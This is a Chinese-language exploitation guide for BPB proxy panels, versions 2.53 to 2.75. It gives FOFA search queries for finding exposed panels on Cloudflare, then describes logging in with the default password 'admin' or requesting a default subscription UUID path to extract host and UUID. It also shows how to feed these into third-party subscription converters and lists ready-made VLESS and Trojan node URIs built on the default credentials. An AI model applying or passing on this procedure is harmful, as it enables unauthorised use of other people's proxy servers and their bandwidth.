bpb面板漏洞适用于2.53以上2.75以下
漏洞文档
如何复现
打开FOFA网络测绘网站
搜索TLS站点 搜索关键词:icon_hash=”-1354027319” && asn=”13335” && port=”443”
搜索noTLS站点 搜索关键词:icon_hash=”-1354027319” && asn=”13335” && port=”80”
面板弱口令
尝试访问/panel并输入弱口令admin。
如登录成功
进入下方点击Copy Sub获取订阅链接(例如 https://299.29.dns-dynamic.com/sub/d0bb3205-93bd-1de6-abc6-0b37013fa59e#BPB-Normal )
提取节点host和uuid备用
host:299.29.dns-dynamic.com
uuid:d0bb3205-93bd-1de6-abc6-0b37013fa59e
如登录失败
尝试访问默认订阅/sub/89b3cbba-e6ac-485a-9481-976a0415eab9
如成功返回base64内容,则提取节点host和uuid备用
host:299.29.dns-dynamic.net
uuid:89b3cbba-e6ac-485a-9481-976a0415eab9
如上两种方法都无法访问,则该面板暂时安全
如何利用
TLS站点利用方法
将host和uuid填入订阅器对应的值,https://VLESS.fxxk.dedyn.io/sub?host=[BPB的host]&uuid=[BPB的uuid]
例如直接订阅该链接https://VLESS.fxxk.dedyn.io/sub?host=299.29.dns-dynamic.net&uuid=89b3cbba-e6ac-485a-9481-976a0415eab9
noTLS站点利用方法
将host和uuid填入订阅器对应的值,https://noTLS.fxxk.dedyn.io/sub?host=[BPB的host]&uuid=[BPB的uuid]
例如直接订阅该链接https://noTLS.fxxk.dedyn.io/sub?host=299.29.dns-dynamic.com&uuid=d0bb3205-93bd-1de6-abc6-0b37013fa59e
整体
VLESS节点
vless://89b3cbba-e6ac-485a-9481-976a0415eab9@visa.cn:443?encryption=none&security=tls&sni=这里填域名&type=ws&host=这里填域名&path=%3Fed%3D2560#BPB好人
BPB订阅
https://这里填域名/sub/89b3cbba-e6ac-485a-9481-976a0415eab9
Trojan节点(露点重灾区,Trojan多得离谱):
trojan://bpb-trojan@visa.cn:443?security=tls&sni=这里填域名&type=ws&host=这里填域名&path=%2Ftr%3Fed%3D2560#BPB好人
noTLS VLESS节点
vless://89b3cbba-e6ac-485a-9481-976a0415eab9@visa.cn:80?encryption=none&security=none&type=ws&host=这里填域名&path=%3Fed%3D2560#BPB好人